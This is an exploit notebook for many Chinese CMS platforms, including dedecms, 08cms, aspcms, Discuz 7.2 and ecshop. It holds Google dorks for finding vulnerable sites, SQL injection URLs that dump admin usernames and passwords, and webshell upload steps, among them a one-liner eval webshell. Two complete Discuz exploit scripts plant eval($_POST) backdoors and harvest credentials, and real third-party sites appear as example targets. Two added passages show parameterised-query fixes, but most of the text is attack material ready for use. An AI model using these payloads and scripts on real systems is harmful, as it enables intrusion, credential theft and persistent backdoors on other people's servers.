make life get better

Bug-ridden CMS exp (exploit notes)



dedecms

Find the version: /data/admin/ver.txt


?dopost=view&aid=1

/data/mysql_error_trace.inc 

/data/mysqli_error_trace.inc 

Path disclosure

/plus/carbuyaction.php?dopost=return&code=bank

/plus/carbuyaction.php?dopost=return&code=cod

/Include/payment/alipay.php

/Include/payment/yeepay.php

/include/dialog/select_media.php?f=form1.murl


/plugins


/plus/search.php?keyword=as&typeArr[ uNion ]=a 


/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\'and+char(@`'`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23


Google keywords:


inurl:?dopost=showad

site:www.xxx.com inurl:login.php?gotopage=

?f=form1.imgsrc&imgstick=big

inurl:login.php?dopost=   good


include/dialog/select_templets.php?&activepath=%2Ftemplets%2Fplus&f=form1.templet   stripped-down version: upload to get a shell

---------------------------------------------------------------------------------------

08cms

sqling

inurl:member/index.php?ugid31=51


inurl:index.php?chid=1


inurl:index.php?caid=1


inurl:index.php?ccid=1


inurl:archive.php?aid=1


inurl:list.php?catid=1

inurl:show.php?id=


exp:


/include/paygate/alipay/pays.php?out_trade_no=22' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT concat(0x3a,mname,0x3a,password,0x3a,email,0x3a) from cms_members limit 0,1),FLOOR(RAND(0)*2))X FROM information_schema.tables GROUP BY X)a) AND'


/search.php?chid=1&carsfullname=aa&searchmode=subject&orderby=aid%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&addno=0&ccid8=366


/search.php?searchmode=subject&searchword=[%]&caid=0&chid=0&ccid4=0&indays=0&orderby=createdate&searchsubmit=1


08CMS official site XSS


http://www.08cms.com/search.phpchid=10&caid=21&searchword=%3Cscript%3Ealert(1);%3C/script%3E


-------------------------------------------------------------------------------------------------

74cms

http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23


------------------------------------------------------------------------------------------------

akcms

sql:

search.php?keywords=a%cf'+or+1=1


exp:

akcms_keyword.php?sid=11111%27and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%280x7e,0x27,password,0x27,0x7e%29%20from%20ak_admins%20limit%200,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%20%271%27=%271&keyword=11


-----------------------------------------------------------------------------------------------------------------------------------


aspcms


Dump the account name


http://www.webshell.cc/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

This dumps the account name for ID=1; if the privileges turn out to be insufficient, try 2, 3, 4, ... after it.


Dump the password


http://www.webshell.cc/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

Back-end login address: /admin/login.asp


Getting a shell from the back end


1. Upload .asp;x directly


2. System configuration info


3. In template management, create a new 1.asp template whose content is the webshell.


Search keyword: intitle:Powered by AspCms2


Different versions require changing the values.


——————Cookie spoofing——————


cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9


——————Obtaining a webshell——————

All versions have a back-end style editor that can modify arbitrary files, so obtaining a webshell is trivial.

AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp


admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1


————————————————————————

Powered by AspCms2.0

No permission check, and an injection vulnerability exists

admin/_content/_About/AspCms_AboutEdit.asp?id=19

Table name: aspcms_user

Column names: loginname, password


Exploit EXP:

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1


2.0 vulnerability tested by: 逍遥复仇 (please credit)


——————Cookie spoofing (same cookie as above)——————


逍遥复仇 ran into a site where the admin had changed the back end, damn it. Couldn't find the back-end home page for ages; in the end downloaded the source from the official site and saw it is home.asp (versions differ; if that is wrong, try main.asp). Tool: Cookie & Inject Browser

——————Obtaining a webshell——————


admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp


----------------------------------------------------------------------------------------------------------------------------------


bbsxp


Default database

/database/bbsxp.mdb BBSXP forum database

/bbs/database/bbsxp.mdb BBSXP forum database


BBSxp2008 8.0.4 SQL injection vulnerability

Vulnerable file: MoveThread.asp

MoveThread.asp, lines 2-24

<%
if CookieUserName =empty then error("您还未<a href=""javascript:BBSXP_Modal.Open('Login.asp',380,170);"">登录</a>") ' just log in and save the cookie
ThreadID=Request("ThreadID") ' Sql Injection Vulnerability
If Not IsNumeric(ThreadID) then
    ThreadIDArray=Split(ThreadID,",") ' check for an array, to avoid an error on line 13
    if IsArray(ThreadIDArray) then
        for i=0 to Ubound(ThreadIDArray)
            if Execute("Select ThreadID from ["&TablePrefix&"Threads] where ThreadID="& ThreadIDArray(i)&"").eof then error "<li>系统不存在该帖子的资料"
        next
        ThreadIDSql=int(ThreadIDArray(0))
    else
        error("参数错误。")
    end if
Else
    ThreadIDSql=int(ThreadID)
End If

ForumID=Execute("Select ForumID From ["&TablePrefix&"Threads] where ThreadID="&ThreadIDSql&"")(0)
%>
<!-- #include file="Utility/ForumPermissions.asp" -->

<!-- #include file="Utility/ForumPermissions.asp" -->


Inject with sqlmap
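The root cause in MoveThread.asp is that IsNumeric is only applied to the whole ThreadID value; once it fails, the value is split on commas and each element is concatenated into SQL without any check. The following is an added example, not BBSXP code, written in PHP with PDO (the language of the other fixes on this page) and an in-memory SQLite table constructed inline: every element of the list must be a plain integer before any SQL is built, and the IDs are bound as placeholders rather than concatenated.

```php
<?php
// Added example, not BBSXP code: safe handling of a comma-separated thread ID list.
// Runs stand-alone against an in-memory SQLite database (needs the pdo_sqlite extension).

/**
 * Parse "12,34,56" into an array of ints. Every element must be a plain
 * non-negative integer; a list containing anything else (quotes, spaces,
 * SQL fragments) is rejected as a whole and null is returned.
 */
function parse_id_list(string $raw): ?array
{
    $ids = [];
    foreach (explode(',', $raw) as $part) {
        if (!preg_match('/^\d{1,10}\z/', $part)) {
            return null;
        }
        $ids[] = (int) $part;
    }
    return $ids;
}

/**
 * Return the subset of $ids that exist in Threads, using one placeholder per ID
 * so the values are bound as data and never become part of the SQL text.
 */
function existing_threads(PDO $db, array $ids): array
{
    if ($ids === []) {
        return [];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT ThreadID FROM Threads WHERE ThreadID IN ($placeholders)");
    $stmt->execute($ids);
    return array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE Threads (ThreadID INTEGER PRIMARY KEY, ForumID INTEGER)');
$db->exec('INSERT INTO Threads VALUES (1, 10), (2, 10), (3, 20)');

$ids = parse_id_list('1,3,99');
var_dump($ids);                         // array(3) { 1, 3, 99 }
var_dump(existing_threads($db, $ids));  // array(2) { 1, 3 }

// The element "3 OR 1=1" is not a plain integer, so the whole request is refused
// before any SQL is built; the IsNumeric/Split logic above let it through.
var_dump(parse_id_list('1,3 OR 1=1'));  // NULL
```

Rejecting the whole list on the first bad element is deliberate: a request that mixes valid and invalid IDs is never legitimate, so there is nothing to salvage from it.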

--------------------------------------------------------------------------------------------------------

cgi

/cgi-bin/gH.cgi

/cgi-bin/Count.cgi

/cgi-bin/php

/cgi-bin/phf

/cgi-bin/guestbook

/cgi-bin/faxsurvey

/cgi-bin/perl

/cgi-bin/webgais

/cgi-bin/websendmail

/cgi-bin/htmlscript

/.svn/entries

-------------------------------------------------------------------------------------------------------

cmseasy

Injection vulnerability


Injection point: /celive/js/include.php?cmseasylive=1111&departmentid=0
Type: MySQL blind (string)
Error keyword: online.gif
Table name: cmseasy_user
Columns: userid,username,password
Just run it through Havij.
Search keyword: Powered by CmsEasy


 


Path disclosure 0day


Discloses the path directly, e.g.: http://www.8090sec.com/index.php?case=archive


Upload vulnerability


Exp:


<form enctype="multipart/form-data" method="post" action="http://www.8090sec.com/celive/live/doajaxfileupload.php">
    <input type="file" name="fileToUpload">
    <input type="submit" value="上传">
</form>


Injection vulnerability fix:


Open the /celive/js/include.php file and go to line 52, or wherever this function's code is


if (isset($_GET['departmentid'])) {
    $departmentid = $_GET['departmentid'];
    $activity_sql = "SELECT `id` FROM `".$config['prefix']."activity` WHERE `departmentid`='".$departmentid."' AND `operatorid`='".$operatorid."'";

Change the code to:

if (isset($_GET['departmentid'])) {
    $departmentid = str_replace("'", "", $_GET['departmentid']);
    $activity_sql = "SELECT `id` FROM `".$config['prefix']."activity` WHERE `departmentid`='".$departmentid."' AND `operatorid`='".$operatorid."'";
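Stripping single quotes from departmentid, as the fix above does, silently alters user input and leaves the query still assembled by string concatenation. The robust fix is to bind both values as parameters. The following is an added example, not CmsEasy code: the same lookup written with a PDO prepared statement, run against an in-memory SQLite table constructed inline (the table name cmseasy_activity mirrors the page's `<prefix>activity` and is an assumption).

```php
<?php
// Added example, not CmsEasy code: the departmentid lookup rewritten with a
// prepared statement, so no user input is ever spliced into the SQL text.
// Runs stand-alone against an in-memory SQLite database (needs pdo_sqlite).

function find_activity_ids(PDO $db, string $prefix, string $departmentid, string $operatorid): array
{
    // $prefix is the configured table prefix (a trusted config value, not user input);
    // the two WHERE values are bound as parameters, never interpolated.
    $sql = "SELECT `id` FROM `{$prefix}activity` WHERE `departmentid` = :dep AND `operatorid` = :op";
    $stmt = $db->prepare($sql);
    $stmt->execute([':dep' => $departmentid, ':op' => $operatorid]);
    return array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

// Constructed sample data; table name is an assumed `<prefix>activity`.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cmseasy_activity (id INTEGER PRIMARY KEY, departmentid TEXT, operatorid TEXT)');
$db->exec("INSERT INTO cmseasy_activity VALUES (1, '0', '7'), (2, '0', '8'), (3, '5', '7')");

// Normal request: departmentid=0 for operator 7 -> [1]
var_dump(find_activity_ids($db, 'cmseasy_', '0', '7'));

// Input that would break a concatenated query is now just a literal value that
// matches no row -> [] (no SQL error, no extra rows).
var_dump(find_activity_ids($db, 'cmseasy_', "0' OR '1'='1", '7'));
```

With parameters bound this way, the str_replace line becomes unnecessary, and the same pattern covers `operatorid` and every other value the original query concatenates.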


editor/editor/dialog/imageuser_mt_mt.php/index.php?case=user&act=log

/celive/js/include.php?cmseasylive=1111&departmentid=0 sql

-------------------------------------------------------------------------------------------------------

Discuz

7.2


EXP:


http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23


http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23


getshell exp


<?php
/*
 * @author: xiaoma
 * @blog  : www.i0day.com
 * @date  : 2014.7.2 23:1
 */
error_reporting(0);
set_time_limit(3000);
$host=$argv[1];
$path=$argv[2];
$js=$argv[3];
$timestamp = time()+10*3600;
$table="cdb_"; // table prefix
if ($argc < 2) {
    print_r('*********************************************************
*  Discuz faq.php SQL Injection Exp                    *
*  ---------By:Www.i0day.com-----------               *
*     Usage: php '.$argv[0].' url [js]                    *
*  -------------------------------------               *
*  js选项: 1.GetShell 2.取密码 3.查表前缀              *
*                                                      *
*   php '.$argv[0].' Www.i0day.com / 1                    *
*   php '.$argv[0].' Www.i0day.com /dz72/ 1               *
*                                                      *
*                                                      *
*********************************************************');
    exit;
}
if($js==1){
    $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20".$table."uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23";
    $resp = sendpack($host,$path,$sql);
    if(strpos($resp,"::")==-1){
        echo '表前缀可能不是默认cdb_ 请先查看表前缀!';
    }else{
        preg_match("/::(.*)::/",$resp,$matches);
        $lenght=intval($matches[1]);
        if($lenght){
            if($lenght<=124){
                $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
                $resp = sendpack($host,$path,$sql);
                if(strpos($resp,"1\^")!=-1){
                    preg_match("/1\^(.*)\'/U",$resp,$key1);
                    $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
                    $resp = sendpack($host,$path,$sql);
                    preg_match("/1\^(.*)\'/U",$resp,$key2);
                    $key=$key1[1].$key2[1];
                    $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $key));
                    $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">bbs.49you.com\');eval($_POST[i0day]);//</item></root>';
                    $cmd2='<?xml version="1.0" encoding="ISO-8859-1"?><root><item id="UC_API">bbs.49you.com</item></root>';
                    $html1 = send($cmd1);
                    $res1=substr($html1,-1);
                    $html2 = send($cmd2);
                    $res2=substr($html1,-1);
                    if($res1=='1'&&$res2=='1'){
                        echo "shell地址:http://".$host.$path.'config.inc.php   pass:i0day';
                    }
                }else{
                    echo '获取失败';
                }
            }
        }
    }
}elseif($js==2){
    $sql="action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20".$table."uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23";
    $resp = sendpack($host,$path,$sql);
    if(strpos($resp,"\^\^\^")!=-1){
        preg_match("/\^\^\^(.*)\^/U",$resp,$password);
        echo '密码:'.$password[1];
    }else{
        echo '表前缀可能不是默认cdb_ 请先查看表前缀!';
    }
}elseif($js==3){
    $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23";
    $resp = sendpack($host,$path,$sql);
    if(strpos($resp,"1\^")!=-1){
        preg_match("/1\^(.*)\^/U",$resp,$t);
        if(strpos($t[1],"cdb_")!=-1){
            echo "表名为:".hex2str($t[1])." 表前缀为默认cdb_ 无需修改";
        }else{
            echo "表名:".hex2str($t[1]).' 不是默认表名cdb_请自行修改代码中的$table';
        }
    }else{
        echo "查看表前缀失败,Sorry";
    }
}else{
    echo "未选择脚本功能";
}

function sendpack($host,$path,$sql,$js){
    $data = "GET ".$path."/faq.php?".$sql." HTTP/1.1\r\n";
    $data.="Host:".$host."\r\n";
    $data.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n";
    $data.="Connection: close\r\n\r\n";
    //$data.=$html."\r\n";
    $ock=fsockopen($host,80);
    if(!$ock){
        echo "No response from ".$host;
        die();
    }
    fwrite($ock,$data);
    $resp = '';
    while (!feof($ock)) {
        $resp.=fread($ock, 1024);
    }
    return $resp;
}

function send($cmd){
    global $host,$code,$path;
    $message = "POST ".$path."/api/uc.php?code=".$code."  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: ".$host."\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: ".$host."\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    //var_dump($message);
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    return $resp;
}

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}

function hex2str($hex){
    $str = '';
    $arr = str_split($hex, 2);
    foreach($arr as $bit){
        $str .= chr(hexdec($bit));
    }
    return $str;
}
?>


--------------------------------------------------------------------------------------------------------------------------------


wordpress


inurl:/wp-content/plugins/easy-comment-uploads/


Keyword: inurl:/wp-content/plugins/easy-comment-uploads/ site:il


# Tested on : Windows 7 , windows 8, linux


The address is: wp-content/uploads/2014/11/


That is, wp-content/uploads/2014/<month>/<your txt name>, for example


http://marvinhamlisch.us/wp-content/uploads/2014/11/<txt name>


For example: http://marvinhamlisch.us/wp-content/uploads/2014/11/JeSse.txt


-------------------------------------------------------------------------------------------------

dkcms

V2.0 data/dkcm_ssdfhwejkfs.mdb


V3.1 _data/___dkcms_30_free.mdb


V4.2 _data/I^(()UU()H.mdb


Default back end: admin


Editor: http://www.yunsec.net/admin/fckeditor


Create an asp folder


FCKeditor path:


Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp

--------------------------------------------------------------------------------------------------

DZ 7.2

#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: gb2312 -*-
# -*- coding: utf_8 -*-
# author iswin
import sys
import hashlib
import time
import math
import base64
import urllib2
import urllib
import re


def sendRequest(url,para):
    try:
        data = urllib.urlencode(para)
        req=urllib2.Request(url,data)
        res=urllib2.urlopen(req,timeout=20).read()
    except Exception, e:
        print 'Exploit Failed!\n%s'%(e)
        exit(0);
    return res


def getTablePrefix(url):
    print 'Start GetTablePrefix...'
    para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
    res=sendRequest(url,para);
    pre=re.findall("Duplicate entry '(.*?)'",res);
    if len(pre)==0:
        print 'Exploit Failed!'
        exit(0);
    table_pre=pre[0][:len(pre[0])-1].decode('hex')
    table_pre=table_pre[0:table_pre.index('_')]
    print 'Table_pre:%s'%(table_pre)
    return table_pre


def getCurrentUser(url):
    para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
    res=sendRequest(url,para)
    pre=re.findall("Duplicate entry '(.*?)'",res)
    if len(pre)==0:
        print 'Exploit Failed!'
        exit(0);
    table_pre=pre[0][:len(pre[0])-1]
    print 'Current User:%s'%(table_pre)
    return table_pre


def getUcKey(url):
    para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
    para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
    res=sendRequest(url,para);
    res1=sendRequest(url,para1);
    key1=re.findall("Duplicate entry '(.*?)'",res)
    key2=re.findall("Duplicate entry '(.*?)'",res1)
    if len(key1)==0:
        print 'Get Uc_Key Failed!'
        return ''
    key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1]
    print 'uc_key:%s'%(key)
    return key


def getRootUser(url):
    para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
    res=sendRequest(url,para);
    pre=re.findall("Duplicate entry '(.*?)'",res)
    if len(pre)==0:
        print 'Exploit Failed!'
        exit(0);
    table_pre=pre[0][:len(pre[0])-1].split(' ')
    print 'root info:\nuser:%s password:%s'%(table_pre[0],table_pre[1])


def dumpData(url,table_prefix,count):
    para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(username,0x20,password) from %s_members limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'%(table_prefix,count)}
    res=sendRequest(url,para);
    datas=re.findall("Duplicate entry '(.*?)'",res)
    if len(datas)==0:
        print 'Exploit Failed!'
        exit(0)
    cleandata=datas[0][:len(datas[0])-1]
    info=cleandata.split(' ')
    print 'user:%s pass:%s'%(info[0],info[1])


def microtime(get_as_float = False) :
    if get_as_float:
        return time.time()
    else:
        return '%.8f %d' % math.modf(time.time())


def get_authcode(string, key = ''):
    ckey_length = 4
    key = hashlib.md5(key).hexdigest()
    keya = hashlib.md5(key[0:16]).hexdigest()
    keyb = hashlib.md5(key[16:32]).hexdigest()
    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()
    key_length = len(cryptkey)
    string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string
    string_length = len(string)
    result = ''
    box = range(0, 256)
    rndkey = dict()
    for i in range(0,256):
        rndkey[i] = ord(cryptkey[i % key_length])
    j=0
    for i in range(0,256):
        j = (j + box[i] + rndkey[i]) % 256
        tmp = box[i]
        box[i] = box[j]
        box[j] = tmp
    a=0
    j=0
    for i in range(0,string_length):
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        tmp = box[a]
        box[a] = box[j]
        box[j] = tmp
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
    return keyc + base64.b64encode(result).replace('=', '')


def get_shell(url,key,host):
    headers={'Accept-Language':'zh-cn',
    'Content-Type':'application/x-www-form-urlencoded',
    'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
    'Referer':url
    }
    tm = time.time()+10*3600
    tm="time=%d&action=updateapps" %tm
    code = urllib.quote(get_authcode(tm,key))
    url=url+"?code="+code
    data1='''<?xml version="1.0" encoding="ISO-8859-1"?>
            <root>
            <item id="UC_API">http://xxx\');eval($_POST[3]);//</item>
            </root>'''
    try:
        req=urllib2.Request(url,data=data1,headers=headers)
        ret=urllib2.urlopen(req)
    except:
        return "Exploit Falied"
    data2='''<?xml version="1.0" encoding="ISO-8859-1"?>
            <root>
            <item id="UC_API">http://aaa</item>
            </root>'''
    try:
        req=urllib2.Request(url,data=data2,headers=headers)
        ret=urllib2.urlopen(req)
    except:
        return "error"

    try:
        req=urllib2.Request(host+'/config.inc.php')
        res=urllib2.urlopen(req,timeout=20).read()
    except Exception, e:
        print 'GetWebshell Failed,%s'%(e)
        return
    print "webshell:"+host+"/config.inc.php,password:3"


if __name__ == '__main__':
    print 'DZ7.x Exp Code By iswin'
    if len(sys.argv)<3:
        print 'DZ7.x Exp Code By iswin\nusage:python dz7.py http://www.iswin.org 10'
        exit(0)
    url=sys.argv[1]+'/faq.php'
    count=int(sys.argv[2])
    user=getCurrentUser(url)
    if user.startswith('root@'):
        getRootUser(url)
    uc_key=getUcKey(url)
    if len(uc_key)==64:
        print 'Start GetWebshell...'
        get_shell(sys.argv[1]+'/api/uc.php',uc_key,sys.argv[1])
    tb_pre=getTablePrefix(url)
    print 'Start DumpData...'
    for x in xrange(0,count):
        dumpData(url,tb_pre,x)


-----------------------------------------------------------------------------------------------------------------

ecshop

Keyword: powered by ecshop

 

Plain payload: user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/*

 

Variant payload: search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319


Append the payload to the site address and press enter to dump the account and password; then drop the payload, append /admin and press enter to go straight into the back end.

 

Getting a shell is simple: find "Library project management", then choose "Shipping method", and insert a PHP one-liner webshell at the very bottom of the code: <?php eval($_POST[x]);?> If that doesn't work, switch to the pre-code of a PHP webshell!


Then save; the one-liner path is: http://www.xxx.org/myship.php. Open "ASP+PHP dual-use Shell.html", fill in the address, click environment variables once, and after it succeeds click upload file to get a shell.


includes/init.php


/includes/modules/payment/alipay.php


/respond.php?code=alipay&subject=00&out_trade_no=%000'%20and%20(select%20*%20from(select%20count(*),concat(floor(rand(0)*2),(select%20concat(000x7c,user_name,000x7c,password,000x7c,ec_salt)%20from%20ecs_admin_user%20limit%201))a%20from%20information_schema.tables%20group%20by%20a)b)%20--%20by%20a


user.php


/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23


/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code


/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00′ and (sel ect * from (sel ect count(*),concat(floor(rand(0)*2),(sel ect concat(user_name,password) from ecs_admin_user limit 1))a from information_schema.tables group by a)b) — By ecshop.co/


ECShop local file inclusion vulnerability


js/calendar.php

$lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : 'zh_cn'; // not filtered: an obvious inclusion vulnerability
if (!file_exists('../languages/' . $lang . '/calendar.php')) {
    $lang = 'zh_cn';
}
